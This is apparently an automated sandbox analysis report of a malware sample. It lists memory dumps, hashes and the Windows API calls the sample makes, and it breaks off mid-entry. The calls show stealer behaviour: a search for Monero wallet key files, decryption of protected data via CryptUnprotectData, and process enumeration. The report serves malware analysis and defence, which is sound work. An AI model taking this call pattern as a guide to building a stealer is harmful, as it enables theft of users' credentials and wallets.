                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: 08d6a01755ea966a68b413d39ddfd08fdbcd8f7d34b1373ebe70ad0a6c578d8f
                            • Instruction ID: 4dc63a5a35a9f41d0cbcd59a5a5d2c6ab93b7df9ea211d293b1e2c392fc23f46
                            • Opcode Fuzzy Hash: 08d6a01755ea966a68b413d39ddfd08fdbcd8f7d34b1373ebe70ad0a6c578d8f
                            • Instruction Fuzzy Hash: D741197194021CABDB24DB94DD99FEEB7B4FB48704F204199E40A72281DB752F86CFA1
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00ED0D73), ref: 00EBE4A2
                            • StrCmpCA.SHLWAPI(?,00ED14F8), ref: 00EBE4F2
                            • StrCmpCA.SHLWAPI(?,00ED14FC), ref: 00EBE508
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EBEBDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: a28b2fbfd190b2859827c6939b7a42ac2cc9c9fb1d97a086a92c2dc857205e6a
                            • Instruction ID: 6ebbbca6d5b3666615f71914b68ccfc886e9c4e5e8f8603420a35625c6089493
                            • Opcode Fuzzy Hash: a28b2fbfd190b2859827c6939b7a42ac2cc9c9fb1d97a086a92c2dc857205e6a
                            • Instruction Fuzzy Hash: C912333290011C9BDB18FB60DE9AFED73B9AB54304F4451BDB50A72181EE355F4ACB92
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Yqn$^o;3$eh^$n,M_$n,M_$})|_
                            • API String ID: 0-2021812280
                            • Opcode ID: cab380fe153cb34c9af4982a5150a4b6cff744b4bdbdf92359abc55e176f4842
                            • Instruction ID: 5248ecee268f03b51b37450038ffab239a07c84402112d1c6c8a8f5c9be3aaa5
                            • Opcode Fuzzy Hash: cab380fe153cb34c9af4982a5150a4b6cff744b4bdbdf92359abc55e176f4842
                            • Instruction Fuzzy Hash: D7B204F3A082109FE304AE2DDC8567ABBE5EF94720F16893DEAC5C7744EA3558018797
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EB9AEF
                            • LocalAlloc.KERNEL32(00000040,?,?,?,00EB4EEE,00000000,?), ref: 00EB9B01
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EB9B2A
                            • LocalFree.KERNEL32(?,?,?,?,00EB4EEE,00000000,?), ref: 00EB9B3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID: N
                            • API String ID: 4291131564-1689755984
                            • Opcode ID: c22b96d6d2e543a2bb2dec20ca9df293f0eba7a06872d07fad170a24c3f78169
                            • Instruction ID: dc68e64a25689bf010720dad15d72b9b58e34820a5163a2b82453862aea3db0f
                            • Opcode Fuzzy Hash: c22b96d6d2e543a2bb2dec20ca9df293f0eba7a06872d07fad170a24c3f78169
                            • Instruction Fuzzy Hash: 9711A4B4240308EFEB10CF64D895FAA77B5FB89704F208058FA199B394C7B6A901CB54
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: bvm$n!pu$ox{$p=[$-vn
                            • API String ID: 0-1979976051
                            • Opcode ID: 2b65e8a980a50da1cd59e9b58303c5f2725b011d27e67c196516dbffb77e19ce
                            • Instruction ID: 7b825c2e8ec99175590bdf8a4485ff9f40e82b705f811a7af5bb1947984340d3
                            • Opcode Fuzzy Hash: 2b65e8a980a50da1cd59e9b58303c5f2725b011d27e67c196516dbffb77e19ce
                            • Instruction Fuzzy Hash: 96B21BF3A082049FE3046E2DEC8567AFBEAEBD4760F19863DE6C4C3744E93558058697
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %N=h$;gZ6$yaw$}-o${
                            • API String ID: 0-2600014743
                            • Opcode ID: 2f4f5e244bd84ffc225940d0d6cb75570070766ffe4cbd4d82ff62e9316d76ab
                            • Instruction ID: 285378da51e7ef6f1efe5f5adcb5de262fa31ceb7fd21ee6d6a76860ba89143e
                            • Opcode Fuzzy Hash: 2f4f5e244bd84ffc225940d0d6cb75570070766ffe4cbd4d82ff62e9316d76ab
                            • Instruction Fuzzy Hash: 71B207F360C2049FE3086E2DEC8567ABBE9EF94720F16453EEAC5C3744E63558058697
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %Y~$HW$\j6$op}$m~
                            • API String ID: 0-406133881
                            • Opcode ID: 959b8727ca057abb6ffdd5139f47130f8c39752ad13dabc6de5b881eddab21fc
                            • Instruction ID: d0ff27ceb56a4d667754e7ff784cbe6bf79d935e2ea3a9c1c424fc0ece8207e3
                            • Opcode Fuzzy Hash: 959b8727ca057abb6ffdd5139f47130f8c39752ad13dabc6de5b881eddab21fc
                            • Instruction Fuzzy Hash: A4B2F6F360C2009FE7046E29EC8567AFBE6EFD4720F1A893DE6C587744EA3558058693
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00EBC871
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00EBC87C
                            • lstrcat.KERNEL32(?,00ED0B46), ref: 00EBC943
                            • lstrcat.KERNEL32(?,00ED0B47), ref: 00EBC957
                            • lstrcat.KERNEL32(?,00ED0B4E), ref: 00EBC978
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: 9163b39747e63829336e5db5de46c26a576e7f0bbce34dde337bafebb4ecf089
                            • Instruction ID: 14a00cb9229d462aab1a599e33c1cdf2a91ed2188a69319843a4895d8c298a3a
                            • Opcode Fuzzy Hash: 9163b39747e63829336e5db5de46c26a576e7f0bbce34dde337bafebb4ecf089
                            • Instruction Fuzzy Hash: D4416E7590820ADFDB20CF90DD89BFEB7B8BB88704F1041A9E509B7280D7755A85CF91
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00EB724D
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EB7254
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00EB7281
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00EB72A4
                            • LocalFree.KERNEL32(?), ref: 00EB72AE
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: 51089ac450ee2db880369687cd749a06a282bb657f0fa84456a7967f0d55f1d0
                            • Instruction ID: 9c440e30500736657ab1293ae143b79804a7d3bba3e56a259189b4abf026b90b
                            • Opcode Fuzzy Hash: 51089ac450ee2db880369687cd749a06a282bb657f0fa84456a7967f0d55f1d0
                            • Instruction Fuzzy Hash: 4E0140B5B40208FBDB20DBE4CD46F9E7778EB44704F104059FB49BB2C4C6B5AA018B64
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EC961E
                            • Process32First.KERNEL32(00ED0ACA,00000128), ref: 00EC9632
                            • Process32Next.KERNEL32(00ED0ACA,00000128), ref: 00EC9647
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 00EC965C
                            • CloseHandle.KERNEL32(00ED0ACA), ref: 00EC967A
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: 29145f10177eab242d1586f48f4fbdce9023eaf7d141289f2cac3bc2d6f3d7db
                            • Instruction ID: e7418162ae063747794601c0146747c52f0bca1ad7ee4154768265b4dbf1af7b
                            • Opcode Fuzzy Hash: 29145f10177eab242d1586f48f4fbdce9023eaf7d141289f2cac3bc2d6f3d7db
                            • Instruction Fuzzy Hash: FF010C75A00208EBCB24DFA5C949FEDB7F8FB48700F10418CA94AA7684D77AAB45CF50
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00ED05B7), ref: 00EC86CA
                            • Process32First.KERNEL32(?,00000128), ref: 00EC86DE
                            • Process32Next.KERNEL32(?,00000128), ref: 00EC86F3
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            • CloseHandle.KERNEL32(?), ref: 00EC8761
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 4fdb7a289c0c71cf1ccf4ba63f241f0f30bc147c74a6e26cb3700882e1c16b9b
                            • Instruction ID: d06bd9337b4afd8207790a045c6a825d1a8ade3dd018f3bc9773b649302b106f
                            • Opcode Fuzzy Hash: 4fdb7a289c0c71cf1ccf4ba63f241f0f30bc147c74a6e26cb3700882e1c16b9b
                            • Instruction Fuzzy Hash: E4314F72901218EBCB24DF50DE45FEEB7B8EB44704F1051AEA50AB2190DB366A46CFA1
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,00EB5184,40000001,00000000,00000000,?,00EB5184), ref: 00EC8EC0
                            Memory Dump Source
